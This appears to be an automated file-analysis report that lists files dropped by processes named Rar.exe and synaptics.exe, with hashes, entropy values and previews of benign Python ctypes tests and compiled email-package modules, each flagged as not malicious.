                                                                                                                                                                                                                                  Preview:# This tests the internal _objects attribute..import unittest..from ctypes import *..from sys import getrefcount as grc....# XXX This test must be reviewed for correctness!!!....# ctypes' types are container types...#..# They have an internal memory block, which only consists of some bytes,..# but it has to keep references to other objects as well. This is not..# really needed for trivial C types like int or char, but it is important..# for aggregate types like strings or pointers in particular...#..# What about pointers?....class ObjectsTestCase(unittest.TestCase):.. def assertSame(self, a, b):.. self.assertEqual(id(a), id(b)).... def test_ints(self):.. i = 42000123.. refcnt = grc(i).. ci = c_int(i).. self.assertEqual(refcnt, grc(i)).. self.assertEqual(ci._objects, None).... def test_c_char_p(self):.. s = b"Hello, World".. refcnt = grc(s).. cs = c_char_p(s).. self.assertEqual(refcnt + 1, grc(s)).. se
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4211
                                                                                                                                                                                                                                  Entropy (8bit):4.513618512523503
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:SP8pCxhpRUMVjmHip62N9wJIaK9vKBPADBuLnkKakdH6n+Hip255icBpEoi+A:SP8pOrRrV+ipwJBMK6BydOiiipEoi+A
                                                                                                                                                                                                                                  MD5:796662BFAA2B40506FD924880D9FAE57
                                                                                                                                                                                                                                  SHA1:E68117C1DB354B95967D94F8AE7BA5AF4F3D6C51
                                                                                                                                                                                                                                  SHA-256:D43EAECB7CD065B7844F405C533C53992055FAB5C1DF63AE133BA06821E53A8C
                                                                                                                                                                                                                                  SHA-512:406CDADD7B92CB684F44829EE0C7C822178AB5EF4A5223601052F7CD38777944E37978B3DE7BA5616965D6B1B3F199659B380769238A24CCAC556DCF89FE7AC3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from ctypes import *..import unittest....class SimpleTestCase(unittest.TestCase):.. def test_cint(self):.. x = c_int().. self.assertEqual(x._objects, None).. x.value = 42.. self.assertEqual(x._objects, None).. x = c_int(99).. self.assertEqual(x._objects, None).... def test_ccharp(self):.. x = c_char_p().. self.assertEqual(x._objects, None).. x.value = b"abc".. self.assertEqual(x._objects, b"abc").. x = c_char_p(b"spam").. self.assertEqual(x._objects, b"spam")....class StructureTestCase(unittest.TestCase):.. def test_cint_struct(self):.. class X(Structure):.. _fields_ = [("a", c_int),.. ("b", c_int)].... x = X().. self.assertEqual(x._objects, None).. x.a = 42.. x.b = 99.. self.assertEqual(x._objects, None).... def test_ccharp_struct(self):.. class X(Structure):.. _fields_ = [("a", c_char_p),..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1038
                                                                                                                                                                                                                                  Entropy (8bit):4.840455422403521
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:iANRK/FTB8yYRAJVyFuwAXwXi7CxwEiXRP4fr9XbPOLcHNY9zMQLonHkT2gn12pe:iQI/1yyYRAJAhFiXRP4R7H6AQLb3kpe
                                                                                                                                                                                                                                  MD5:DD09C074CE7F3DA9732725E4B31E6B14
                                                                                                                                                                                                                                  SHA1:B7871AE3105ECF0B38DE491006A8A1E6AF15CE25
                                                                                                                                                                                                                                  SHA-256:15F6D841475846ECE6B6966301B737E3D9B3069411497B9495FFAE0C81D04212
                                                                                                                                                                                                                                  SHA-512:63795F8218ADC535DC61A27BDDBFF8C6DF216D758F2B01F5F8D9B2EBF92A162C7D982420C05274B8C847EDB1526C3043CFBD7126BB81DDB9B239870391C7E0A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest....from ctypes import *..import _ctypes_test....lib = CDLL(_ctypes_test.__file__)....def three_way_cmp(x, y):.. """Return -1 if x < y, 0 if x == y and 1 if x > y""".. return (x > y) - (x < y)....class LibTest(unittest.TestCase):.. def test_sqrt(self):.. lib.my_sqrt.argtypes = c_double,.. lib.my_sqrt.restype = c_double.. self.assertEqual(lib.my_sqrt(4.0), 2.0).. import math.. self.assertEqual(lib.my_sqrt(2.0), math.sqrt(2.0)).... def test_qsort(self):.. comparefunc = CFUNCTYPE(c_int, POINTER(c_char), POINTER(c_char)).. lib.my_qsort.argtypes = c_void_p, c_size_t, c_size_t, comparefunc.. lib.my_qsort.restype = None.... def sort(a, b):.. return three_way_cmp(a[0], b[0]).... chars = create_string_buffer(b"spam, spam, and spam").. lib.my_qsort(chars, len(chars)-1, sizeof(c_char), comparefunc(sort)).. self.assertEqual(chars.raw, b" ,,aaaadmmmnpppsss\x00")....if __name__
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7318
                                                                                                                                                                                                                                  Entropy (8bit):4.620670361439591
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:8urUr59bF81oyJEy9wvaQBS//atOdtNmZa1yl0p8GawkpRJuv05c0hbb56G8jHA:8EWDqCVuQBKSgNmOWXLlQ05c0hbbl8jA
                                                                                                                                                                                                                                  MD5:56D960C9820B94873420AF1568C7E6BC
                                                                                                                                                                                                                                  SHA1:CEE3F1B8CFC736670EA82FE359418480B277E215
                                                                                                                                                                                                                                  SHA-256:8F34FDC30617226B0DBE3488944E4811ACE54245258354280469AED27CCB18CB
                                                                                                                                                                                                                                  SHA-512:D314611FCDBA890396235B50FB6273493591350A7EDAD0C6102E25ADE4450F55F01A0A33EEBC96D92C8AFEC736AB5D5008CBD07F0B03E6BDBB7167013E4F7809
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from ctypes import *..import os..import shutil..import subprocess..import sys..import unittest..import test.support..from test.support import import_helper..from test.support import os_helper..from ctypes.util import find_library....libc_name = None....def setUpModule():.. global libc_name.. if os.name == "nt":.. libc_name = find_library("c").. elif sys.platform == "cygwin":.. libc_name = "cygwin1.dll".. else:.. libc_name = find_library("c").... if test.support.verbose:.. print("libc_name is", libc_name)....class LoaderTest(unittest.TestCase):.... unknowndll = "xxrandomnamexx".... def test_load(self):.. if libc_name is None:.. self.skipTest('could not find libc').. CDLL(libc_name).. CDLL(os.path.basename(libc_name)).. self.assertRaises(OSError, CDLL, self.unknowndll).... def test_load_version(self):.. if libc_name is None:.. self.skipTest('could not find libc').. if os.pa
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1571
                                                                                                                                                                                                                                  Entropy (8bit):4.908307476598281
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:wwQTrff0h6aHqCZ9EwkaLt/bsTkiC50zukUzzt/bih5Nz54t/biuyzOQqt/bijsN:wwQTrfch6OD9tLNooIzrmNs4NMqNP
                                                                                                                                                                                                                                  MD5:A6340CD89DB635743F6AFFE4A5C95A54
                                                                                                                                                                                                                                  SHA1:0A8EA024FE66DF245CFAF6D3C455CEEA8C03176A
                                                                                                                                                                                                                                  SHA-256:30085C0763DB3CEDB9735DDC78D0810B7D6D1F383FF28C9087353766C3215ED9
                                                                                                                                                                                                                                  SHA-512:4DF57F75F68F20E6D60DF3BFF1A3BE77344C30B1A71AAE22126ADB817F0E93E01EC6613F7F20330499DCC2920032F05F5D0C7D57354E1ED763C53E3F2DCD2653
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mime..parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r.....0C:\Users\Public\M20EKMMEH2\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r....).z.Read
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5751
                                                                                                                                                                                                                                  Entropy (8bit):5.419136465891573
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:gOU9w0nDhN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:yNN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                                                                  MD5:A8A3A06A3C94E0C6A288E2494422319A
                                                                                                                                                                                                                                  SHA1:8964A55AE4F75350DF0A1662368DF04439A9D58B
                                                                                                                                                                                                                                  SHA-256:C1F98F6D311DD77600FB9FE660BEC9CF5BE2BE0EB4F36B17F808049D958AFBF2
                                                                                                                                                                                                                                  SHA-512:45E5C31A3437923760A3A3F0A3217B87BB77E8A619D457E640E1B15E18E6E9F3E1180A701445F3860B2912CA1E9797FE3ED58302071AC8C57DD164D59A31C62E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....6C:\Users\Public\M20EKMMEH2\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._QByteMaps....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12523
                                                                                                                                                                                                                                  Entropy (8bit):5.367166437455321
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:48lfo3BPanIUGehSKaPvqloJzp9UokTFptf58GxRWc:XlgxMGeMPFp9HkT4G3F
                                                                                                                                                                                                                                  MD5:12B8AE295D55DAAC9D200B5AF1146275
                                                                                                                                                                                                                                  SHA1:4BD00A9691802C8A42143A144A4CA2FE628046FE
                                                                                                                                                                                                                                  SHA-256:A64AA33CA4BB0BAF6BEDDEEB9C95530C72934BDB5A5864AF2FC79B27802348D2
                                                                                                                                                                                                                                  SHA-512:9853EEB9219C15A690A4903A0EDCA5E4E9E94599508BAEDCBF4EF6E29D76FDCAAF18BA924AEC482114A71223EFE7F4E197AF2F5965DEB9695E2D71B846B4FAC3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....2C:\Users\Public\M20EKMMEH2\lib\email\_parseaddr.pyr....-...s................r....c....................C...s....|.s.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14793
                                                                                                                                                                                                                                  Entropy (8bit):5.054206747012966
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jbtx++ovk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:jbt1oM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                                                                  MD5:D32115AB24EDCCB0284843072C756D2B
                                                                                                                                                                                                                                  SHA1:83947325373FE2DA5F536EE779DB69D3487676AC
                                                                                                                                                                                                                                  SHA-256:6FC1E26AF05E603D5679EA1D58C375E0072502A01E82246B63043D044D11B224
                                                                                                                                                                                                                                  SHA-512:9C1F0DF72262E2EF10ACB8FD63AD0CBFFB1943FDC81CD208C3735C136565D0ED4E42619A2217A382EBD2C4C21E7EE4D049A826A9DC449388C2CAC84A973970A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3251
                                                                                                                                                                                                                                  Entropy (8bit):5.380330585726796
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IGlAnFLYxoMN59tl3kWReNFOsr3S8/sMGQHbfuaJg+EtINnig2b4nm+M78ozTho:7OFLsbReNFxrd2QSaO+Eiig2gmV78oHu
                                                                                                                                                                                                                                  MD5:84C9610F6A6DB97D3723572DDD7AA83D
                                                                                                                                                                                                                                  SHA1:213C58E947FCB87E7F47481C65CACD8BDD6DE804
                                                                                                                                                                                                                                  SHA-256:61492622A50247288F897844326972C28D906878FDC277D903E2DF558A09689A
                                                                                                                                                                                                                                  SHA-512:E7973B1B1027E2C449F077E12CBF315619C5B61D59D4E80C48DE177C5DCF97F1B026B28559C41ADD6390930418255AE2947AE40989FD14A05B2EBBF708F92669
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11586
                                                                                                                                                                                                                                  Entropy (8bit):5.325848276943549
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+71q2Qm6z+wYiW28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:e1ZRS+ZP2yGRz/p2/5ObDbv+w
                                                                                                                                                                                                                                  MD5:A022A0C1B6E00AEA3C797BD889B0CE40
                                                                                                                                                                                                                                  SHA1:950CCBF6978208975F1248AB635CE71819D8A487
                                                                                                                                                                                                                                  SHA-256:83FE80F657C6BDC5F5A25B95ABFB006678300468FE292451C8FDD7CF561E64CE
                                                                                                                                                                                                                                  SHA-512:13DF1EE5843B10A875AF348C24E971C2BE7F621C464770D8CFE74A68033D519F65A57FFA1EB59456D17646888EB4B205BA67B625AF631F993D2A23A2C47ACCA0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1638
                                                                                                                                                                                                                                  Entropy (8bit):5.0902013007626135
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1y7gaTT5rqICrNt7xYWWuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:1/9ht7OWWEgQFYSvrEDkvyz3
                                                                                                                                                                                                                                  MD5:F240C45CEA0F49DCA2826FC5E3E9D285
                                                                                                                                                                                                                                  SHA1:A24599BE0651AAE204AFADF699BA188D2DFA40BB
                                                                                                                                                                                                                                  SHA-256:B7D7F1EB2E3634D4E8915B8CF401C67B73354C3292FF741D4399B03BFBD0B8E7
                                                                                                                                                                                                                                  SHA-512:79742EC868846426FBD1AAF6F41F4F7630C164EBEC007F8B1861B703A3EE05D23AA902FA603AAAC66FF55DC9AB4A39B6CF69BEC981C72DFE04CA154B48634ED8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r.....0C:\Users\Public\M20EKMMEH2\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfer-Encoding he
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5713
                                                                                                                                                                                                                                  Entropy (8bit):4.736039051135126
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wYI+E7YT1ZUQ6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:wYTEOKQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                                                                  MD5:A8995099F79618959EE8A69F66DA9E5E
                                                                                                                                                                                                                                  SHA1:6B807F52211687AF62741F8D864F44F75F5153A4
                                                                                                                                                                                                                                  SHA-256:B962CF3AA5673D74F9EFA7759C73E60C76B09C5F70B732334FBF5EFF02D5A9E3
                                                                                                                                                                                                                                  SHA-512:FD1018FC23D6E21AC07E4595C3AFCF9D5B023961A6AF577286298EC123E3B55691950A81D15C76721772728FF6BDBE557874011018F7D8CB3B85270BA6D9E2F8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r......C:\Users\Public\M20EKMMEH2\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....r....r.......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10589
                                                                                                                                                                                                                                  Entropy (8bit):5.448131486999686
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:MQt3lEm00KYgjRm95weZd6S3DFKTbefqH0P302hjD8gYo5:HtVEz0KYr5weZJ3DFSbei+029D8Zo5
                                                                                                                                                                                                                                  MD5:2123BC92446F0AA229F78D993A5DDE43
                                                                                                                                                                                                                                  SHA1:91665FBD5E8EA4635950993427FAC24E1DD1B2B8
                                                                                                                                                                                                                                  SHA-256:B6A7CDB552CB334F62A88CFFA69E4328EBF18ECD169291F809C86976274F47A5
                                                                                                                                                                                                                                  SHA-512:668A241E8A03C144F477AB10F1B11C634B937832F93B901618B52B4D365D7339DACC2C0F41AAB552F498F1EB8737887C6EB6CFDA8F9BB10A38770D8A391055D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16473
                                                                                                                                                                                                                                  Entropy (8bit):5.351481404152596
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:lEojVdDyA8pfSNW44RPb/bliTC72UjV9LFqSevFmHj0HP8HMJ25cPh:lEy/85S844NbMGvcPh
                                                                                                                                                                                                                                  MD5:A027615B6EA5EBE31403F7E5BF1C8A3D
                                                                                                                                                                                                                                  SHA1:F9C171B7D9B15B5CCC5376667BF1FEDCD57919E9
                                                                                                                                                                                                                                  SHA-256:6735EDF430D2603BEA23E3D11A2A4F2CED3640377A4D33322B33E92EE112C218
                                                                                                                                                                                                                                  SHA-512:CF6F1F16F07041B8E58E9C487617A2E00F1623FBB86FB159EB42DA415E9589B58FD6DA1915F5BFB3570A749939769665F0A96E42919BF45B23E22BE5B0F081E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1979
                                                                                                                                                                                                                                  Entropy (8bit):5.3421050349273775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:mhA49ILWjxO3OzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:mrIWdl5UFsMbhOQGTEl9
                                                                                                                                                                                                                                  MD5:4F9D1A686F5C9922F5A7F4A5B6B99640
                                                                                                                                                                                                                                  SHA1:1840F5F3CB316BCF499C27082B9ACF7530E3835D
                                                                                                                                                                                                                                  SHA-256:F412B4C149BDEF4AAF1BF5B544DF32CDBD63B58DC3A7ED861BA932C55B643B7E
                                                                                                                                                                                                                                  SHA-512:D0B4203BB46B9ED1CE3790B0B55F692079615FC8189F9B1EEBF7117DDC53BF8DEFE28275904724661DF4D57054D78A32F56B8DCC38FF4FAE8FED7487DB0CC4C2
                                                                                                                                                                                                                                  Malicious:false
